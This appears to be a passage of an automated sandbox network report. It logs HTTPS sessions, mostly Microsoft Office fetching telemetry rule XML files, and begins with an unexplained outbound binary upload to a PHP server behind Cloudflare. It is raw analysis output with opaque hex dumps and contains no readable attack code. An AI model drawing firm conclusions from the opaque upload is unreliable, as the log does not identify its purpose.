                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: b9 08 fd ef b8 45 5e 99 f5 11 8f 7f 7b 6b fd db e6 d2 cf 5d 80 b7 da 04 20 61 01 e6 9d 7b dc 8b 03 16 b3 a9 8c 22 d1 e1 ac 0b 66 2f ea 01 b5 24 89 5a 2d 06 6e ec b4 cb a9 f7 f2 6a e0 19 93 1d ba 18 f0 bc 53 4c 3e a7 7a 9a e3 f6 a4 b9 f8 08 e7 c6 f7 58 29 78 2f eb 40 6a 8c 04 c0 77 e0 18 38 02 be 1b 05 cb 6e 7d d1 fe d2 c2 cb 74 a6 11 d1 e5 ce 16 97 2c 50 b0 6e 6c a7 70 4b 9e e6 31 60 69 91 dd 50 af b2 16 92 dc 82 24 96 a3 54 7b dc 90 5a ca 4a 7d 54 75 96 aa bc d0 fd 45 17 04 a9 92 03 b6 24 c0 87 75 33 41 43 99 a9 57 c5 7c 79 98 c5 cc e3 d1 1b a7 de 60 af 0c 35 a0 75 b7 e8 21 fd 3d 26 f9 e7 4a 34 93 e0 08 29 d0 db 80 07 c4 7c 80 12 af 3e 40 57 a2 29 25 9b 28 de d4 66 ee 8d 32 12 04 ab f6 6e f5 76 48 96 e0 16 85 d8 60 6c 1e be 63 6b d7 ac 19 2b 55 d4 b5 c0
                                                                                                                                                                          Data Ascii: E^{k] a{"f/$Z-njSL>zX)x/@jw8n}t,PnlpK1`iP$T{ZJ}TuE$u3ACW|y`5u!=&J4)|>@W)%(f2nvH`lck+U
                                                                                                                                                                          2024-11-23 18:01:32 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:32 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=c2kt426od0u867jnb6a0c6o3k1; expires=Wed, 19-Mar-2025 11:48:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XsvOuNyCnqZcs0%2BKskpN1XTZX%2BXmPfDo79f08tYWDqGy0iOUtCoOUS8Sh%2ByNXXqTA9s7gCIFsV5542%2B5JOIQ6Z1FLaKpBQ9dd1bxQi1fpDbbXe4TTGs9BBMhPb3q1VeS4WerImY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8e7310771a974268-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1839&sent=358&recv=529&lost=0&retrans=0&sent_bytes=2846&recv_bytes=572647&delivery_rate=1644144&cwnd=252&unsent_bytes=0&cid=b1390ee464de7d0d&ts=8325&x=0"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          9192.168.2.54971613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:27 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 450
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                          ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                          x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180128Z-174c587ffdf9xbcchC1TEBxkz40000000370000000002k4z
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:28 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          10192.168.2.54972013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:27 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 3788
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                          ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                          x-ms-request-id: 5299024a-c01e-0079-4d47-3ce51a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180128Z-174c587ffdftv9hphC1TEBm29w000000035000000000gbds
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:28 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          11192.168.2.54971713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:27 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 2980
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                          x-ms-request-id: d4aa3518-701e-0098-625d-3c395f000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180128Z-15b8b599d886w4hzhC1TEBb4ug00000003dg000000002792
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:28 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          12192.168.2.54971913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:27 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 408
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                          ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                          x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180128Z-178bfbc474bh5zbqhC1NYCkdug00000004tg0000000044ef
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:28 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          13192.168.2.54971813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:27 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 2160
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                          ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                          x-ms-request-id: 2aa1f1ad-b01e-003d-7c43-3cd32c000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180128Z-174c587ffdf7t49mhC1TEB4qbg00000003a00000000002rf
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:28 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          14192.168.2.54972213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:30 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:31 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 474
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                          ETag: "0x8DC582B9964B277"
                                                                                                                                                                          x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180131Z-174c587ffdf9xbcchC1TEBxkz4000000032g00000000hmdm
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:31 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          15192.168.2.54972313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:30 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:31 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                          ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                          x-ms-request-id: 51fbd25c-e01e-0020-5e4d-3cde90000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180131Z-15b8b599d88hr8sfhC1TEBbca4000000035g000000009vht
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:31 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          16192.168.2.54972413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:31 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:31 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                          ETag: "0x8DC582BB10C598B"
                                                                                                                                                                          x-ms-request-id: 1e988f1d-b01e-0070-1b8c-3a1cc0000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180131Z-174c587ffdfmlsmvhC1TEBvyks00000003h0000000000swz
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:31 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          17192.168.2.54972513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:31 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:31 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 632
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                          ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                          x-ms-request-id: d8f13441-a01e-0021-5e2d-3c814c000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180131Z-178bfbc474b9xljthC1NYCtw9400000004mg00000000n55f
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
